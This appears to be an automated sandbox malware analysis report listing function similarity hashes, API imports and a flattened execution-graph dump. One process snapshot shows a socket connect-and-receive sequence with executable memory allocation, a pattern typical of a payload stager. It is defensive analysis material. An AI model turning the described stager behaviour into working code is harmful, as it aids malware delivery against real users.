• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID:
• String ID: incorrect header check$invalid window size$unknown compression method
• API String ID: 0-1186847913
• Opcode ID: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
• Instruction ID: 2adac2097dd96be31fc3b588942c2867655d7ffa7f23b7c0480b06af30ac11af
• Opcode Fuzzy Hash: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
• Instruction Fuzzy Hash: 35917F726042008BFB6ACF26D58879D3BE5F3083D4F154129EB598BBB0D73AD9A1CB40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID:
• String ID: $ $invalid block type
• API String ID: 0-2056396358
• Opcode ID: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
• Instruction ID: a7252faa3c80580baed472012d71d0b62e6cbeab3839f0b874d886ed0dadd07f
• Opcode Fuzzy Hash: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
• Instruction Fuzzy Hash: 6F6190B3610B508BE726CF26D9883AD37A0F3193D4F554125EB568BBE0D77AD590CB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_WO.jbxd
Similarity
• API ID: memmove
• String ID:
• API String ID: 2162964266-0
• Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
• Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
• Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
• Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID:
                                                              • API String ID: 2544007295-0
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage:0.9%
                                                              Dynamic/Decrypted Code Coverage:14.7%
                                                              Signature Coverage:11.8%
                                                              Total number of Nodes:68
                                                              Total number of Limit Nodes:3

                                                              Control-flow Graph

                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 006900D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 006900E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 006900FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 0069013F
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_690000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: 327eec653f23560a16df2192c97ad8ff14f98007befe078a999dd95378402dd5
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: A711C0B168029C3EF93022A29C47FBB291CCF42BA4F100025BB45FA5C1C8829C4481FA

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ceb6121e470dd3cfc2d7d2917fae457fcaf0d6d10cf17591cb545ae1a2ff9fe
                                                              • Instruction ID: c05b59b9f4d16bb34214b641b6d9fa06ca1f9ade271ab6cde73b9576214de40b
                                                              • Opcode Fuzzy Hash: 3ceb6121e470dd3cfc2d7d2917fae457fcaf0d6d10cf17591cb545ae1a2ff9fe
                                                              • Instruction Fuzzy Hash: 4DD0C2672CA205B9E120BC404C86BF60ECC570DB52F24D4B2B30B761C3C2BC0B4220DE

                                                              Control-flow Graph

                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(E553A458,00000000,00000162,00001000,00000040), ref: 0040385C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: db0306e660f09edcc4f5f164cefd3230d4254f124b2ae6d508b866a97e50a146
                                                              • Instruction ID: 4c74da6d6e42419762f900211d688d1802f97791c277bf9d3c462be40ba0076a
                                                              • Opcode Fuzzy Hash: db0306e660f09edcc4f5f164cefd3230d4254f124b2ae6d508b866a97e50a146
                                                              • Instruction Fuzzy Hash: 84C080E56606265FD113E8541CD15D57FDF4A0572234444BFE50187481C65545C3958E

                                                              Control-flow Graph

                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(E553A458,00000000,00000162,00001000,00000040), ref: 0040385C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ba2b6113f8c1361e142327349295ae9b9a32fc9305af006692fd18a4717b3ee3
                                                              • Instruction ID: aa9c93fac3d8d666de76663d130f4f6789e6514029e2e882532ee80fad553c2d
                                                              • Opcode Fuzzy Hash: ba2b6113f8c1361e142327349295ae9b9a32fc9305af006692fd18a4717b3ee3
                                                              • Instruction Fuzzy Hash:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28fd3fa50fbd8cf2bb7474e30977f42a20ef7becb69c517353e431a02ed97b9e
                                                              • Instruction ID: 499dceeee35c5cbcfd260d2c75f29c8aca30d98019ce3b9202ad5b964b78262f
                                                              • Opcode Fuzzy Hash: 28fd3fa50fbd8cf2bb7474e30977f42a20ef7becb69c517353e431a02ed97b9e
                                                              • Instruction Fuzzy Hash: 19017B31A8C2961BD3018A645806D85BFA49B83230F0843BACC91EB3E3C355D45AC3CA

                                                              Execution Graph

                                                              Execution Coverage:14.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
Sleep PostMessageW 7738->7739 7739->7737 7744 14000e83b HeapAlloc 7745 14000e87d 7744->7745 7746 14000303f 7757 140012600 TlsGetValue 7746->7757 7748 140003044 7749 140012360 HeapFree 7748->7749 7750 140003058 7749->7750 7751 140012360 HeapFree 7750->7751 7752 14000306a 7751->7752 7753 140012360 HeapFree 7752->7753 7754 14000307c 7753->7754 7755 140012360 HeapFree 7754->7755 7756 14000308e 7755->7756 7757->7748 7758 14000c040 7763 140011248 EnterCriticalSection 7758->7763 7761 14000c075 7762 14000c05d CloseHandle 7762->7761 7764 14001127a LeaveCriticalSection 7763->7764 7765 14001126c 7763->7765 7766 14000c058 7764->7766 7765->7764 7766->7761 7766->7762 8102 1400048c0 8111 140012600 TlsGetValue 8102->8111 8104 1400048c5 8105 140012360 HeapFree 8104->8105 8106 1400048d9 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048eb 8107->8108 8109 140012360 HeapFree 8108->8109 8110 1400048fd 8109->8110 8111->8104 8250 14000e540 8251 140011248 2 API calls 8250->8251 8252 14000e55f 8251->8252 8253 14000b740 8256 14000b758 8253->8256 8296 14000b5d8 8256->8296 8258 14000b790 8259 14000b5d8 2 API calls 8258->8259 8260 14000b79b 8259->8260 8261 14000b5d8 2 API calls 8260->8261 8262 14000b7a6 8261->8262 8263 14000b7b2 GetStockObject 8262->8263 8264 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8262->8264 8263->8264 8265 14000be5c 3 API calls 8264->8265 8266 14000b83f 8265->8266 8267 14000bf44 7 API calls 8266->8267 8268 14000b84d 8267->8268 8269 14000b859 IsWindowEnabled 8268->8269 8270 14000b87a 8268->8270 8269->8270 8271 14000b863 EnableWindow 8269->8271 8272 14000be5c 3 API calls 8270->8272 8271->8270 8273 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8272->8273 8274 14000b902 6 API calls 8273->8274 8275 14000bb96 8273->8275 8276 14000ba12 SendMessageW wcslen wcslen SendMessageW 8274->8276 8277 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8274->8277 8278 14000bba4 8275->8278 8299 1400127b0 TlsGetValue 
8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 
